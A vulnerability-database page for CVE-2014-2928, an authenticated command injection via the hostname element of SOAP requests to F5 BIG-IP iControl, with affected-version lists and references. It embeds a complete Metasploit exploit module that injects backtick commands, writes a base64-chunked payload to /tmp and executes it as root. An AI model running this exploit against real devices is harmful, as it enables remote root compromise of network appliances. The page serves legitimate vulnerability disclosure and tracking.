CVE-2014-2928 : Detail

CVE-2014-2928

68.27%V3
Network
2014-05-12
12h00 +00:00
2014-11-14
13h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The iControl API in F5 BIG-IP LTM, APM, ASM, GTM, Link Controller, and PSM 10.0.0 through 10.2.4 and 11.0.0 through 11.5.1, BIG-IP AAM 11.4.0 through 11.5.1, BIG-IP AFM and PEM 11.3.0 through 11.5.1, BIG-IP Analytics 11.0.0 through 11.5.1, BIG-IP Edge Gateway, WebAccelerator, WOM 10.1.0 through 10.2.4 and 11.0.0 through 11.3.0, Enterprise Manager 2.1.0 through 2.3.0 and 3.0.0 through 3.1.1, and BIG-IQ Cloud, Device, and Security 4.0.0 through 4.3.0 allows remote administrators to execute arbitrary commands via shell metacharacters in the hostname element in a SOAP request.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.1 AV:N/AC:H/Au:S/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 34927

Publication date : 2014-10-08 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "F5 iControl Remote Root Command Execution", 'Description' => %q{ This module exploits an authenticated remote command execution vulnerability in the F5 BIGIP iControl API (and likely other F5 devices). }, 'License' => MSF_LICENSE, 'Author' => [ 'bperry' # Discovery, Metasploit module ], 'References' => [ ['CVE', '2014-2928'], ['URL', 'http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html'] ], 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Targets' => [ ['F5 iControl', {}] ], 'Privileged' => true, 'DisclosureDate' => "Sep 17 2013", 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(443), OptBool.new('SSL', [true, 'Use SSL', true]), OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/']), OptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']), OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin']) ], self.class) end def check get_hostname = %Q{<?xml version="1.0" encoding="ISO-8859-1"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Body> <n1:get_hostname xmlns:n1="urn:iControl:System/Inet" /> </SOAP-ENV:Body> </SOAP-ENV:Envelope> } res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'), 'method' => 'POST', 'data' => get_hostname, 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] }) res.body =~ /y:string">(.*)<\/return/ hostname = $1 send_cmd("whoami") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'), 'method' => 'POST', 'data' => get_hostname, 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] }) res.body =~ /y:string">(.*)<\/return/ new_hostname = $1 if new_hostname == "root.a.b" pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Body> <n1:set_hostname xmlns:n1="urn:iControl:System/Inet"> <hostname>#{hostname}</hostname> </n1:set_hostname> </SOAP-ENV:Body> </SOAP-ENV:Envelope> } send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'), 'method' => 'POST', 'data' => pay, 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] }) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def send_cmd(cmd) pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Body> <n1:set_hostname xmlns:n1="urn:iControl:System/Inet"> <hostname>`#{cmd}`.a.b</hostname> </n1:set_hostname> </SOAP-ENV:Body> </SOAP-ENV:Envelope> } send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'), 'method' => 'POST', 'data' => pay, 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] }) end def exploit filename = Rex::Text.rand_text_alpha_lower(5) print_status('Sending payload in chunks, might take a small bit...') i = 0 while i < payload.encoded.length cmd = "echo #{Rex::Text.encode_base64(payload.encoded[i..i+4])}|base64 --decode|tee -a /tmp/#{filename}" send_cmd(cmd) i = i + 5 end print_status('Triggering payload...') send_cmd("sh /tmp/#{filename}") end end

Products Mentioned

Configuraton 0

F5>>Big-ip_webaccelerator >> Version 9.4.0

F5>>Big-ip_webaccelerator >> Version 9.4.1

F5>>Big-ip_webaccelerator >> Version 9.4.2

F5>>Big-ip_webaccelerator >> Version 9.4.3

F5>>Big-ip_webaccelerator >> Version 9.4.4

F5>>Big-ip_webaccelerator >> Version 9.4.5

F5>>Big-ip_webaccelerator >> Version 9.4.6

F5>>Big-ip_webaccelerator >> Version 9.4.7

F5>>Big-ip_webaccelerator >> Version 9.4.8

F5>>Big-ip_webaccelerator >> Version 10.0.0

F5>>Big-ip_webaccelerator >> Version 10.0.1

F5>>Big-ip_webaccelerator >> Version 10.1.0

F5>>Big-ip_webaccelerator >> Version 10.2.0

F5>>Big-ip_webaccelerator >> Version 10.2.1

F5>>Big-ip_webaccelerator >> Version 10.2.2

F5>>Big-ip_webaccelerator >> Version 10.2.3

F5>>Big-ip_webaccelerator >> Version 10.2.4

F5>>Big-ip_webaccelerator >> Version 11.0.0

F5>>Big-ip_webaccelerator >> Version 11.1.0

F5>>Big-ip_webaccelerator >> Version 11.2.0

F5>>Big-ip_webaccelerator >> Version 11.2.1

F5>>Big-ip_webaccelerator >> Version 11.3.0

Configuraton 0

F5>>Big-ip_local_traffic_manager >> Version 10.0.0

F5>>Big-ip_local_traffic_manager >> Version 10.0.1

F5>>Big-ip_local_traffic_manager >> Version 10.1.0

F5>>Big-ip_local_traffic_manager >> Version 10.2.0

F5>>Big-ip_local_traffic_manager >> Version 10.2.1

F5>>Big-ip_local_traffic_manager >> Version 10.2.2

F5>>Big-ip_local_traffic_manager >> Version 11.0.0

Configuraton 0

F5>>Big-ip_protocol_security_module >> Version 9.4.5

F5>>Big-ip_protocol_security_module >> Version 9.4.6

F5>>Big-ip_protocol_security_module >> Version 9.4.7

F5>>Big-ip_protocol_security_module >> Version 9.4.8

F5>>Big-ip_protocol_security_module >> Version 10.0.0

F5>>Big-ip_protocol_security_module >> Version 10.0.1

F5>>Big-ip_protocol_security_module >> Version 10.1.0

F5>>Big-ip_protocol_security_module >> Version 10.2.0

F5>>Big-ip_protocol_security_module >> Version 10.2.1

F5>>Big-ip_protocol_security_module >> Version 10.2.2

F5>>Big-ip_protocol_security_module >> Version 10.2.3

F5>>Big-ip_protocol_security_module >> Version 10.2.4

F5>>Big-ip_protocol_security_module >> Version 11.0.0

F5>>Big-ip_protocol_security_module >> Version 11.1.0

F5>>Big-ip_protocol_security_module >> Version 11.2.0

F5>>Big-ip_protocol_security_module >> Version 11.2.1

F5>>Big-ip_protocol_security_module >> Version 11.3.0

F5>>Big-ip_protocol_security_module >> Version 11.4.0

F5>>Big-ip_protocol_security_module >> Version 11.4.1

Configuraton 0

F5>>Big-ip_link_controller >> Version 10.0.0

F5>>Big-ip_link_controller >> Version 10.0.1

F5>>Big-ip_link_controller >> Version 10.1.0

F5>>Big-ip_link_controller >> Version 10.2.0

F5>>Big-ip_link_controller >> Version 10.2.1

F5>>Big-ip_link_controller >> Version 10.2.2

F5>>Big-ip_link_controller >> Version 11.0.0

Configuraton 0

F5>>Big-ip_application_security_manager >> Version 10.0.0

F5>>Big-ip_application_security_manager >> Version 10.0.1

F5>>Big-ip_application_security_manager >> Version 10.1.0

F5>>Big-ip_application_security_manager >> Version 10.2.0

F5>>Big-ip_application_security_manager >> Version 10.2.1

F5>>Big-ip_application_security_manager >> Version 10.2.2

F5>>Big-ip_application_security_manager >> Version 11.0.0

Configuraton 0

F5>>Big-ip_global_traffic_manager >> Version 10.0.0

F5>>Big-ip_global_traffic_manager >> Version 10.0.1

F5>>Big-ip_global_traffic_manager >> Version 10.1.0

F5>>Big-ip_global_traffic_manager >> Version 10.2.0

F5>>Big-ip_global_traffic_manager >> Version 10.2.1

F5>>Big-ip_global_traffic_manager >> Version 10.2.2

F5>>Big-ip_global_traffic_manager >> Version 11.0.0

Configuraton 0

F5>>Big-ip_wan_optimization_manager >> Version 10.0.0

F5>>Big-ip_wan_optimization_manager >> Version 10.0.1

F5>>Big-ip_wan_optimization_manager >> Version 10.1.0

F5>>Big-ip_wan_optimization_manager >> Version 10.2.0

F5>>Big-ip_wan_optimization_manager >> Version 10.2.1

F5>>Big-ip_wan_optimization_manager >> Version 10.2.2

F5>>Big-ip_wan_optimization_manager >> Version 11.0.0

Configuraton 0

F5>>Big-ip_access_policy_manager >> Version 10.1.0

F5>>Big-ip_access_policy_manager >> Version 10.2.0

F5>>Big-ip_access_policy_manager >> Version 10.2.1

F5>>Big-ip_access_policy_manager >> Version 10.2.2

F5>>Big-ip_access_policy_manager >> Version 11.0.0

Configuraton 0

F5>>Big-ip_edge_gateway >> Version 10.1.0

F5>>Big-ip_edge_gateway >> Version 10.2.0

F5>>Big-ip_edge_gateway >> Version 10.2.1

F5>>Big-ip_edge_gateway >> Version 10.2.2

F5>>Big-ip_edge_gateway >> Version 11.0.0

References

http://seclists.org/fulldisclosure/2014/May/32
Tags : mailing-list, x_refsource_FULLDISC
http://www.exploit-db.com/exploits/34927
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.osvdb.org/106728
Tags : vdb-entry, x_refsource_OSVDB